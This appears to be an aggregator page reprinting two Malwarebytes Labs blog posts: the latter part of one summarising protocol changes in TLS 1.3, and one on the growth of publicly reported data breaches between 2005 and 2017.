Here’s a short selection of alterations from the TLS Wiki page, and as you can see, there’s a fair bit of functionality being stripped out to make way for the new revisions:

  • Removing support for weak and lesser-used named elliptic curves (see elliptic-curve cryptography)
  • Removing support for MD5 and SHA-224 cryptographic hash functions
  • Requiring digital signatures even when a previous configuration is used
  • Integrating HKDF and the semi-ephemeral DH proposal
  • Replacing resumption with PSK and tickets
  • Supporting 1-RTT handshakes and initial support for 0-RTT (see round-trip delay time)
  • Dropping support for many insecure or obsolete features, including compression, renegotiation, non-AEAD ciphers, static RSA and static DH key exchange, custom DHE groups, point format negotiation, Change Cipher Spec protocol, Hello message UNIX time, and the length field AD input to AEAD ciphers

Indeed, one of the biggest problems caused by this new set of comprehensive changes are those faced by financial institutions, and anyone dealing with regulatory compliance. Due to how the new setup works, it’ll be harder for them to inspect traffic on their networks and see what’s taking place. There’s also the potential for technical flaws causing some major headaches, as is evidenced by the spectacular bricking of 50,000 Chromebooks last year after an update was applied.

Despite the inevitable teething problems, ultimately this is good news for most of us, with the exception of a few organisations who’ll have to find new ways to work with it. Hopefully, a stronger set of security protocols with TLS 1.3 will result in a very big headache for people dabbling in mischief.

The post TLS 1.3 is nearly here appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The data breach epidemic: no info is safe

Malwarebytes - Thu, 03/29/2018 - 16:00

By now it’s obvious that data security technology and protocols haven’t kept pace with the needs of consumers. Even as more people trust their most sensitive personal information to online apps and services, databases are routinely exposed. In 2017 alone, we learned about massive data breaches from major organizations like Equifax, Uber, and Verizon.

In other words: We’re in the midst of a data breach epidemic.

How bad is it? To help better understand the leaky state of data, TruthFinder created this infographic based on data from the Identity Theft Center. In 2005, there were 157 publicly-reported data breaches of sensitive information. By 2017, that number increased tenfold to 1,579 data breaches.

The severity of breaches is increasing, too. The first breach that leaked over 1 million credit card numbers occurred in 2005, but now we hear about breaches that expose tens or hundreds of millions of records every few months.

Check out TruthFinder’s infographic below. It provides an idea of the serious challenge that security professionals face as they work to turn the tide and secure personal information.


The post The data breach epidemic: no info is safe appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds